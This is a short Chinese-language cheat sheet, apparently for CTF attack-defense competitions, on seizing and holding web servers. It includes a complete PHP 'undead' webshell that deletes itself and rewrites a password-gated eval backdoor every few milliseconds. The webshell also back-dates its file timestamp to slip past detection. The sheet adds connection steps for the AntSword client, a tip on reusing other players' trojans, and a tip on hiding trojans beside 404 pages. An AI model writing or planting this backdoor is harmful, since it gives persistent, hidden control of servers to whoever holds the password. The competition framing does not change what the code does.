1.迅速使用winscp下载全部站,常见的路径为/var/www/、/app

使用d盾扫描,看一下哪个手快的大佬先行getshell

或者查看最近修改的文件

白嫖大佬在各个靶机里的木马,连接上找flag

2查看当前cms的版本,搜索相关漏洞

3不死马:

1
2
3
4
5
6
7
8
9
10
<?php 
ignore_user_abort(true);
set_time_limit(0);
unlink(__FILE__); 
$file = 'fla2.php';
$code = '<?php if(md5($_GET["pass"])=="1a1dc91c907325c69271ddf0c944bc72"){@eval($_POST[a]);} ?>'; 
while (1){ <br> file_put_contents($file,$code); 
system('touch -m -d "2018-12-01 09:10:12" .fla2.php'); 
usleep(5000); } 
?>
  1. ignore_user_abort(true);
    函数设置与客户机断开是否会终止脚本的执行。这里设置为true则忽略与用户的断开,即使与客户机断开脚本仍会执行。
  2. set_time_limit()
    函数设置脚本最大执行时间。这里设置为0,即没有时间方面的限制。
  3. unlink(__FILE__)
    删除文件本身,以起到隐蔽自身的作用。
  4. while
    循环内每隔usleep(5000)即写新的后门文件
  5. system()
    执行的命令用于修改文件的创建或修改时间,可以绕过“find –name ‘*.php’ –mmin -10”命令检测最近10分钟修改或新创建的PHP文件,但不一定有用,可选。

蚁剑?pass=pass连接,密码a,执行时删除本体存在于内存中

相关文章可查看不死马_a674212706的博客-CSDN博客

4 kill -9 pid可杀除一般进程

5 木马文件配合404页面容易被忽略